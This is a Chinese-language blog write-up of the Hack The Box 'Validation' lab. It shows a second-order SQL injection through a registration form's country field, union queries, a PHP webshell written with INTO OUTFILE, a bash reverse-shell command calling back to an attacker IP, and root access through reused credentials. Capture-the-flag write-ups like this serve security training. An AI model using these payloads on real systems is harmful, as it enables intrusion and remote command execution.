Linux/Validation

已于 2024-03-20 21:32:18 修改
阅读量357 收藏 5
点赞数 5
分类专栏: HackTheBox 文章标签: 网络安全
于 2024-03-07 15:21:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45557138/article/details/136534976
版权

Enumeration

nmap

第一次扫描发现系统对外开放了22,80,4566和8080端口,端口详细信息如下

系统对外开放了4个端口,从nmap的结果来看,8080无法访问,手动尝试后4566也无法访问,只能从80端口开始

TCP/80

访问80端口,得到如下界面,输入用户名选择国家后可以注册

填入用户名vegetable,国家选择Brazil,点击Join Now后,在burpsuite中可以看到请求包与服务器响应,注意到country也是可以修改的,服务器在收到请求后,进行了重定向,并且设置了一个名为user的cookie

页面被重定向到account.php,但是只是输出了几句话

重新创建了一个用户,另一个地方的vegetable,但是发现cookie是相同的,尝试使用在线网站解密该cookie值,发现cookie就是用户名的md5

考虑到页面让选择国家,但是burpsuite抓到的请求可以修改,在brazil参数后添加一个单引号,发送后还是会进行302跳转,但是重定向到account.php页面后,页面报错

设置Brazil' or 1=1--+,页面回显正常,设置1=2,页面回显异常

这是一个二阶sql注入

Foothold

Second Order SQL Injection

我将注册包发送至repeater,在Brazil后添加payload,发送后,会得到响应。将响应包中的cookie值复制放到account.php包,然后发送

设置order by 1,回显正常,设置order by 2,回显报错

可以判断列数为1,可以设置Brazil' union select 1--+,可以执行,并且存在回显点

设置Brazil' union select database();--+,可以执行,显示了一个数据库名

查看registration数据库中的表

Brazil' union select table_name from information_schema.tables where table_schema = 'registration'--+

可以看到有一个registration表

查看registration表中的columns

Brazil' union select column_name from information_schema.columns where table_name = 'registration'

可以看到有username,userhash,country,regtime

查看username发现只有一个vegetable

查看权限

Brazil' union select privilege_type FROM information_schema.user_privileges--+

可以看到有file权限

尝试能否写入webshell,但是报错了

Brazil' union select "hello world!" into+outfile '/var/www/html/vegetable.txt'--+

可是去请求vegetable.txt时,却能够成功访问

那么可以直接写入一个webshell

Brazil' union select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/vegetable.php'

上传后尝试访问,发现上传成功并且能够执行命令

然后可以执行一个反向shell

curl 10.10.11.116/vegetable.php --data-urlencode 'cmd=bash -c "bash -i >&/dev/tcp/10.10.14.3/4444 0>&1"'

在监听端能得到shell,可以找到user.txt

Privilege Escalation

在web目录下,config.php中有认证信息

考虑密码复用,使用该密码登录root,成功!

ve9etable
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决ClassNotFoundException: javax.validation.spi.ValidationProvider
粗人
06-08 1879
在我们这边非常正常的一个VM环境,但在中东一个Sales的机器上load vm就是不正常,VM中系统的环境如下: Spring 3.0 Spring DM(OSGi) 2.0.M1 Hibernate Validator 其它XX 系统启动时出现:   Caused by: java.lang.ClassNotFoundException: javax.validation.sp...
ORA-04045: errors during recompilation/revalidation of LBACSYS.LBAC_EVENTS
weixin_30542079的博客
06-25 592
使用orachk工具检查数据库实例的时候,发现报告里面有类似下面这样一些错误(最近有给Oracle 10g应用补丁PSU 10.2.0.5.180717,不清楚是这个产生的还是其他原因导致),使用脚本检查,发现有很多INVALID对象(具体参考[转载]—Health Check Reports Problem: Dependency$ p_timestamp mismatch for VALID ...
Linux内存性能测试工具stream
07-27
STREAM 是事实上的行业标准基准用于测量持续的内存带宽。
车道线数据集CULane评价可直接用的linux系统下的opencv3压缩包
04-22
车道线检测CULane数据集评价所需的linux系统下的opencv3.4.0已经编译好,可直接使用,需要在.bashrc中添加 export PKG_CONFIG_PATH=/home1/dc/Install_Package/opencv4.0.1/lib/pkgconfig export LD_LIBRARY_PATH=/home1/dc/Install_Package/opencv4.0.1/lib 再执行 source ~/.bashrc后, 将lib文件夹路径直接替换eval_validation.sh文件下内容即可。
hwvalid.rar_Linux/Unix编程_Unix_Linux_
08-11
Module Name: hwvalid - I/O request validation.
validation-webhook
03-18
验证器 使用Golang和Revel WebFramework编写的自定义准入控制器,以了解Kubernetes准入控制器的概念 证书生成 Kubernetes API服务器与自定义准入控制者Webhook之间的通信通过ssl证书进行保护。请按照以下步骤生成自签名的ssl证书: 在Linux操作系统上安装cfssl实用程序。 curl -s -L -o / usr / bin / cfssl curl -s -L -o / usr / bin / cfssljson chmod + x / usr / bin / {cfssl,cfssljson} 初始化并生成必要的配置文件cfssl gencert -initca ca-csr.json | cfssljson-裸机ca cfssl print-defaults csr> validator.json 生成证书cfssl genc
cns3420vb.rar_Linux/Unix编程_Unix_Linux_
08-11
Cavium Networks CNS3420 Validation Board for Linux.
linux下载/解压ImageNet2012数据集
weixin_44368521的博客
02-26 401
亲测,有用,留档。
SSL证书申请之如何创建/.well-known/pki-validation/目录?
热门推荐
★【World Of Moshow 郑锴】★
11-10 1万+
问题背景 直接在windows下新建.well-known目录是会报错的,那么如何创建/.well-known/pki-validation/目录? 解决方案 莫慌,请用CMD,cd /d 对应的目录 然后输入mkdir .well-known创建。 ...
linux下载/解压ImageNet-1k数据集
qq_45588019的博客
07-06 1万+
linux下载/解压ImageNet-1k数据集
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024-2030全球与中国低脂凝乳奶酪市场现状及未来发展趋势.docx
04-30
2024-2030全球与中国低脂凝乳奶酪市场现状及未来发展趋势
毕业设计:vue+springboot乌鲁木齐南山冰雪旅游服务网站(源码 + 数据库 + 说明文档)
04-30
毕业设计:vue+springboot乌鲁木齐南山冰雪旅游服务网站(源码 + 数据库 + 说明文档) 2 开发工具及技术 2 2.1 B/S结构的介绍 2 2.2 JSP及SpringBoot技术的介绍 2 2.3 HTML及Vue技术的介绍 2 2.4 MYSQL数据库的介绍 3 2.5 开发环境的介绍 3 3 需求分析 4 3.1 可行性分析 4 3.2 功能需求分析 4 3.3 非功能需求分析 4 4 总体设计 6 4.1 系统总体结构设计 6 4.2 系统的数据库设计 6 5 系统功能实现 6 5.1 注册用户 6 5.2 管理员用户 6 6 系统测试 6 6.1 测试目的 6 6.2 测试内容 6 6.3 测试总结 6
C# 超简单的离线人脸识别库 ( 基于 SeetaFace6 ).zip
04-30
c
华为数字化转型实践28个精华问答.docx
最新发布
04-30
华为数字化转型实践28个精华问答.docx
2024年全球二极管阵列光谱仪行业总体规模、主要企业国内外市场占有率及排名.docx
04-30
2024年全球二极管阵列光谱仪行业总体规模、主要企业国内外市场占有率及排名
基于AT89C51单片机的温度上下限自动控制检报警设计.zip-06
04-30
基于51单片机的温度检测调节系统 由STC89C51单片机+液晶1602显示+DS18B20温度传感器+继电器+报警模块构成 具体功能: 1、采用DS18B20温度传感器测温并用LCD1602显示; 2、按键为设置按键、加键和减键。可设置上下限温度控制范围; 3、当温度超过设定的上或下限时,相应的指示灯亮,同时相应的继电器吸合,继电器可以驱动负载工作; 4、温度测量范围0到99.9摄氏度,精度为0.1摄氏度。
2024年中国高量子效率传感器行业研究报告.docx
04-30
2024年中国高量子效率传感器行业研究报告
基于C++14语法的任务链.zip
04-30
基于C++14语法的任务链.zip
nand validation
08-02
回答: 根据引用[1]中的描述,您在使用DaVinci-PSP-SDK-03.20.00.11进行U-Boot和Linux内核的开发时遇到了NAND验证的问题。您可以使用"ubiformat/dev/mtd2-frfs"命令来格式化NAND分区并刷写UBI根文件系统,然后使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值